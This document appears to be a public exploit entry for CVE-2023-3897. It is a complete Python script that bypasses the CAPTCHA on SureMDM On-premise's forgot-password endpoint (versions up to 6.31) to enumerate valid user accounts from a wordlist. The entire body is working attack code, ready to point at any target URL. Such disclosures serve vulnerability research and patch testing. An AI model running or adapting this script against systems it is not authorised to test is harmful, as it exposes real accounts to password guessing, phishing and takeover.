SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration - CVE-2023-3897

1. # Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration
2. # Date: 05/12/2023
3. # Exploit Author: Jonas Benjamin Friedli
4. # Vendor Homepage: https://www.42gears.com/products/mobile-device-management/
5. # Version: <= 6.31
6. # Tested on: 6.31
7. # CVE : CVE-2023-3897
8.  
9. import requests
10. import sys
11.  
12. def print_help():
13.     print("Usage: python script.py [URL] [UserListFile]")
14.     sys.exit(1)
15.  
16.  
17. def main():
18.     if len(sys.argv) != 3 or sys.argv[1] == '-h':
19.         print_help()
20.  
21.     url, user_list_file = sys.argv[1], sys.argv[2]
22.  
23.     try:
24.         with open(user_list_file, 'r') as file:
25.             users = file.read().splitlines()
26.     except FileNotFoundError:
27.         print(f"User list file '{user_list_file}' not found.")
28.         sys.exit(1)
29.  
30.     valid_users = []
31.     bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
32.     enumerate_txt = "This User ID/Email ID is not registered."
33.     for index, user in enumerate(users):
34.         progress = (index + 1) / len(users) * 100
35.         print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")
36.  
37.         data = {"UserId": user}
38.         response = requests.post(
39.             f"{url}{bypass_dir}",
40.             json=data,
41.             headers={"Content-Type": "application/json; charset=utf-8"}
42.         )
43.  
44.         if response.status_code == 200:
45.             response_data = response.json()
46.             if enumerate_txt not in response_data.get('d', {}).get('message', ''):
47.                 valid_users.append(user)
48.  
49.     print("\nFinished processing users.")
50.     print(f"Valid Users Found: {len(valid_users)}")
51.     for user in valid_users:
52.         print(user)
53.  
54. if __name__ == "__main__":
55.     main()
56.